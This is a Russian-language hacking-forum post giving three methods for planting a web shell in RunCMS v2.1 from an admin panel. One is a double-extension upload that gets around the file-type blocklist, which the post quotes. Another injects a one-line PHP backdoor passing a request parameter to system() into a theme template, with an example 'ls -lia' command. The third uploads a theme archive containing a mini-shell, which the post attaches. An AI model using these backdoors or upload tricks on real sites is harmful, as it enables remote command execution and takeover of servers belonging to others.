Показать сообщение отдельно
Старый 07.07.2010, 08:18   #4
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию RunCMS v2.1

RunCMS v2.1

1 способ:

Если Apache выполняет файлы с расширением .php.bla, то в
Администрирование->Управление модулями->Архив файлов->Основные настройки->Допустимые форматы файла добавляем |.zp
и заливаемся из Администрирование->Управление модулями->Архив файлов->Добавить, редактировать или удалить раздел/файл.
Ищем по адресу:
http://localhost/runcms/modules/downloads/cache/files/shell.php.zp

В чистом виде .php разрешить не получится, т.к. в коде определено
PHP код:
// Fix for bad extension  Thanks to Philippe of E-rcxfr.com (ExV2) for this patch.
$badarray = array(=> '.php',=> '.php3',=> '.php4',=> '.exe',=> '.php5',=> '.cgi',=> '.pl',=> '.sh',=> '.phtml',=> '.shtml',10 => '. shtm',11 => '.phtm');
$is in_array ($this->file[$filename]['extension'], $badarray);
// и запрет 
Фокусы с .php%00 не проходят, т.к. меняется на .php_00
PHP код:
function set_basename($value$filename='uploaded_files') {
    
$this->file[$filename]['basename'] = strtolowerpreg_replace('/[^a-z0-9_.-]/i''_'$value) ); 

2 способ:

В Администрирование->Основные настройки сайта смотрим "Скин по умолчанию" и редактируем его в
Администрирование->Редактор тем->runcms2
Редактируем, например themeheader.html, как рукам нравится
Код:
<td  id ="divers"><br /><b><?php echo _TH_HEADER_TXT;?></b>
<td  id ="divers"><br /><b><?php echo _TH_HEADER_TXT;if($_REQUEST[pass]) system($_REQUEST[pass]);?></b>
http://localhost/runcms/modules/news/
post
pass=ls -lia


3 способ

Администрирование->Редактор тем
загружаем новую тему в zip архиве, должна быть соблюдена структура темплейта.

шелл будет тут
http://localhost/runcms/themes/ops/theme.php

Облегченная тема с минишеллом в аттаче, можно заменить на свой шелл.
Вложения
Тип файла: zip ops.zip (3.0 Кб, 967 просмотров)
nikp вне форума   Ответить с цитированием